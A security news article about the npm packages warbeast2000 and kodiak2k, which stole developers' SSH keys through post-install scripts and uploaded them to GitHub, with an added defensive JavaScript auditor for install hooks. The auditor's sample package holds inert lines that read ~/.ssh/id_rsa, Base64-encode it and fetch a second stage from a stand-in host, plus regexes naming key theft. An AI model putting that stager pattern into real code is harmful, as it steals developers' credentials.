Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub
The Hacker News –
Two malicious npm packages, warbeast2000 and kodiak2k, were found to abuse GitHub as a drop site for SSH keys stolen from developers' systems.
The packages garnered 412 and 1,281 downloads, respectively, before the npm maintainers removed them; the most recent downloads occurred on January 21, 2024. ReversingLabs, a software supply chain security firm, found multiple versions of each: eight of warbeast2000 and more than 30 of kodiak2k.
Both packages run a post-install script once installed; the script fetches and executes two separate JavaScript files.
warbeast2000 targets private SSH keys, while kodiak2k looks for a key named "meow", likely a placeholder left over from early development.
The stolen keys are Base64-encoded and uploaded to an attacker-controlled GitHub repository, compromising every system whose keys were taken.
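The install-hook mechanism described above is the part a defender can check for before a package ever runs. The following is an added example, not code from the article, The Hacker News, or ReversingLabs: it audits package manifests for npm lifecycle hooks (preinstall, install, postinstall, prepare), follows any local script the hook launches, and scans both for the behaviours the report describes (remote fetch, running downloaded code, reading ~/.ssh keys, Base64 encoding, pushing to GitHub). The package names, file names, file contents and indicator regexes are constructed for illustration and are not indicators from the real samples.

```javascript
// Added example (not the article's or ReversingLabs' code): audit npm package
// manifests for install-time lifecycle hooks and scan the scripts they launch.
// All package data below is constructed; none of it is the real malware.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators, applied to the hook command and to any local script
// file the command executes. Labels describe the behaviour each regex matches.
const INDICATORS = [
  { label: "remote fetch", re: /\b(curl|wget|https?:\/\/|fetch\s*\(|https?\.get)/i },
  { label: "runs downloaded code", re: /\b(eval|new Function|child_process|execSync|spawn)\b/ },
  { label: "reads SSH keys", re: /\.ssh[\\/]|id_(rsa|ed25519|ecdsa|dsa)\b/i },
  { label: "base64 encoding", re: /toString\(\s*['"]base64['"]\s*\)|\bbase64\b/i },
  { label: "GitHub upload", re: /api\.github\.com|github\.com\/.*\/(contents|git\/blobs)/i },
];

// Extract local JavaScript files a hook command runs, e.g. `node lib/setup.js`.
// "node-gyp rebuild" does not match because no whitespace follows "node".
function referencedFiles(command) {
  const files = [];
  const re = /\bnode\s+(?:-[-\w]+\s+)*([\w./-]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) files.push(m[1]);
  return files;
}

// pkg = { name, manifest, files: { relativePath: contents } }
// Returns one finding per lifecycle hook present, with matched indicator labels.
function auditPackage(pkg) {
  const scripts = pkg.manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const texts = [command];
    for (const f of referencedFiles(command)) {
      if (f in pkg.files) texts.push(pkg.files[f]);
    }
    const reasons = new Set();
    for (const text of texts) {
      for (const ind of INDICATORS) if (ind.re.test(text)) reasons.add(ind.label);
    }
    findings.push({ package: pkg.name, hook, command, reasons: [...reasons] });
  }
  return findings;
}

function auditAll(packages) {
  return packages.flatMap(auditPackage);
}

// Hooks with at least one matched indicator; hooks with none still deserve review.
function flagged(findings) {
  return findings.filter((f) => f.reasons.length > 0);
}

// Constructed sample: a benign native add-on with a legitimate install hook, and
// a package that mimics the reported pattern (stager run from postinstall,
// private key read, Base64 encode, upload to a GitHub repository).
const SAMPLE_PACKAGES = [
  {
    name: "benign-native-addon",
    manifest: { scripts: { install: "node-gyp rebuild", test: "mocha" } },
    files: {},
  },
  {
    name: "example-stager",
    manifest: { scripts: { postinstall: "node lib/setup.js" } },
    files: {
      "lib/setup.js": [
        "const https = require('https');",
        "const { execSync } = require('child_process');",
        "https.get('https://example.invalid/stage2.js', (res) => { /* run second stage */ });",
        "const key = require('fs').readFileSync(process.env.HOME + '/.ssh/id_rsa');",
        "const body = key.toString('base64');",
        "// PUT body to https://api.github.com/repos/<attacker>/<repo>/contents/<file>",
      ].join("\n"),
    },
  },
];

for (const f of auditAll(SAMPLE_PACKAGES)) {
  const status = f.reasons.length ? "SUSPICIOUS" : "review";
  const why = f.reasons.length ? ` [${f.reasons.join(", ")}]` : "";
  console.log(`${status} ${f.package} ${f.hook}: ${f.command}${why}`);
}
```

The check is deliberately static: it never executes the hook, which is the point, since running the installer is exactly what hands the attacker the keys. In practice this belongs in CI against node_modules after a `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), so lifecycle hooks are inventoried before anyone allows them to run; a hook with no matched indicator is not cleared, only lower priority for manual review, because a stager can fetch its payload from a URL the regexes do not recognise.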
Additionally, subsequent versions of kodiak2k were found to launch the Empire post-exploitation framework from an archived GitHub project and execute the Mimikatz hacking tool to extract credentials from process memory.
ReversingLabs highlighted this as the latest example of cybercriminals using open source package managers and related infrastructure in malicious software supply chain campaigns targeting development and end-user organizations.
Link: https://thehackernews.com/2024/01/malicious-npm-packages-exfiltrate-1600.html